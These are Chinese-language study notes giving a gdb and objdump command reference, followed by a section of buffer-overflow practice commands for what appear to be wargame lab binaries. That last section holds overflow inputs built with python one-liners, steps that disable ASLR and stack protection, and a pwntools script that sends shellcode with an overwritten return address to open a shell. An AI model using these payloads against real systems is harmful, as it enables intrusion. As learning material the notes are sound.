gdb 常用命令
=======
r 执行程序至断点
c 继续执行程序
s 单步执行
n 步过执行
x 查看指定地址的内存地址的值 x/(n,f,u为可选参数) n为需要显示的内存单元个数
f为显示格式:
x(hex)按十六进制格式显示变量。
d(decimal)按十进制格式显示变量。
u(unsigneddecimal) 按十进制格式显示无符号整型。
o(octal)按八进制格式显示变量。
t(binary)按二进制格式显示变量。
a(address)按十六进制格式显示变量。
c(char)按字符格式显示变量。
f(float)按浮点数格式显示变量
u为每个单元的大小按字节数来算
格式:b *内存地址(函数名)
delete:删除所有断点
delete num:删除编号为num的断点
info break:列出所有断点
格式: p变量名
如果要查看变量的地址,用p &变量名
Info 查看值
info proc map 查看进程的内存映射
find /bin/sh 查看结果中包含bin/sh的值
修改寄存器的值:set var $寄存器 = expr
给存储在address地址的变量类型为type的变量赋值: set {type}address=expr
i 显示信息更多信息 用help函数查看
格式: disas/disass/disassemble 函数名/起始地址[,结束地址]
例如:
disas main,显示main函数对应的汇编代码
objdump命令
--archive-headers
-a
显示档案库的成员信息,类似ls -l将lib*.a的信息列出。
-b bfdname
--target=bfdname
指定目标码格式。这不是必须的,objdump能自动识别许多格式,比如:
objdump -b oasys -m vax -h fu.o
显示fu.o的头部摘要信息,明确指出该文件是Vax系统下用Oasys编译器生成的目标文件。objdump -i将给出这里可以指定的目标码格式列表。
-C
--demangle
将底层的符号名解码成用户级名字,除了去掉所开头的下划线之外,还使得C++函数名以可理解的方式显示出来。
--debugging
-g
显示调试信息。企图解析保存在文件中的调试信息并以C语言的语法显示出来。仅仅支持某些类型的调试信息。有些其他的格式被readelf -w支持。
-e
--debugging-tags
类似-g选项,但是生成的信息是和ctags工具相兼容的格式。
--disassemble
-d
从objfile中反汇编那些特定指令机器码的section。
-D
--disassemble-all
与 -d 类似,但反汇编所有section.
--prefix-addresses
反汇编的时候,显示每一行的完整地址。这是一种比较老的反汇编格式。
-EB
-EL
--endian={big|little}
指定目标文件的小端。这个项将影响反汇编出来的指令。在反汇编的文件没描述小端信息的时候用。例如S-records.
-f
--file-headers
显示objfile中每个文件的整体头部摘要信息。
-h
--section-headers
--headers
显示目标文件各个section的头部摘要信息。
-H
--help
简短的帮助信息。
-i
--info
显示对于 -b 或者 -m 选项可用的架构和目标格式列表。
-j name
--section=name
仅仅显示指定名称为name的section的信息
-l
--line-numbers
用文件名和行号标注相应的目标代码,仅仅和-d、-D或者-r一起使用使用-ld和使用-d的区别不是很大,在源码级调试的时候有用,要求编译时使用了-g之类的调试编译选项。
-m machine
--architecture=machine
指定反汇编目标文件时使用的架构,当待反汇编文件本身没描述架构信息的时候(比如S-records),这个选项很有用。可以用-i选项列出这里能够指定的架构.
--reloc
-r
显示文件的重定位入口。如果和-d或者-D一起使用,重定位部分以反汇编后的格式显示出来。
--dynamic-reloc
-R
显示文件的动态重定位入口,仅仅对于动态目标文件意义,比如某些共享库。
-s
--full-contents
显示指定section的完整内容。默认所有的非空section都会被显示。
-S
--source
尽可能反汇编出源代码,尤其当编译的时候指定了-g这种调试参数时,效果比较明显。隐含了-d参数。
--show-raw-insn
反汇编的时候,显示每条汇编指令对应的机器码,如不指定--prefix-addresses,这将是缺省选项。
--no-show-raw-insn
反汇编时,不显示汇编指令的机器码,如不指定--prefix-addresses,这将是缺省选项。
--start-address=address
从指定地址开始显示数据,该选项影响-d、-r和-s选项的输出。
--stop-address=address
显示数据直到指定地址为止,该项影响-d、-r和-s选项的输出。
-t
--syms
显示文件的符号表入口。类似于nm -s提供的信息
-T
--dynamic-syms
显示文件的动态符号表入口,仅仅对动态目标文件意义,比如某些共享库。它显示的信息类似于 nm -D|--dynamic 显示的信息。
-V
--version
版本信息
--all-headers
-x
显示所可用的头信息,包括符号表、重定位入口。-x 等价于-a -f -h -r -t 同时指定。
-z
--disassemble-zeroes
一般反汇编输出将省略大块的零,该选项使得这些零块也被反汇编。
@file 可以将选项集中到一个文件中,然后使用这个@file选项载入。
$ gcc stack0.c-o stack0-fno-stack-protector -m32
gcc -g hello.c -o hello
g++-g hello.cpp -o hello
$ python -c "print 'A'*65" | ./stack0
$ python -c "print'A'*64+'\x64\x63\x62\x61'" | xargs ./stack1
这里的 xargs 表示输入数据作为参数。
$ ./overflow1-3948d17028101c40$(python -c 'print"A"*64 + "B"')
$ export GREENIE=`python -c 'print "A"*64 + "\x0a\x0d\x0a\x0d"'`
ulimit -cunlimited
sudo sh -c 'echo"/tmp/core.%t" > /proc/sys/kernel/core_pattern'
制造溢出
$ python -c "print 'A'*200" | ./stack5
$ gdb stack5 /tmp/core.1522317467
gdb-peda$ x/10s $esp-0x50
$ strace ./overflow3-28d8a442fb232c0c$(python -c 'print"A"*76 +"BBBB"')
关闭Linux系统的ASLR保护。
sudo sh -c"echo 0 > /proc/sys/kernel/randomize_va_space"
判断当前是否开启ASLR保护。
$ setarch `uname -m` -R ./overflow4-4834efeff17abdfb /$(python -c 'print "A"*76 + "BBBB"')
from pwn import *
io = process('./stack5')
sc = asm(shellcraft.i386.sh())
payload = sc
payload += ((0x48+4)-len(sc)) * 'a'
payload += '\x20\xcf\xff\xff'
io.sendline(payload)
io.interactive()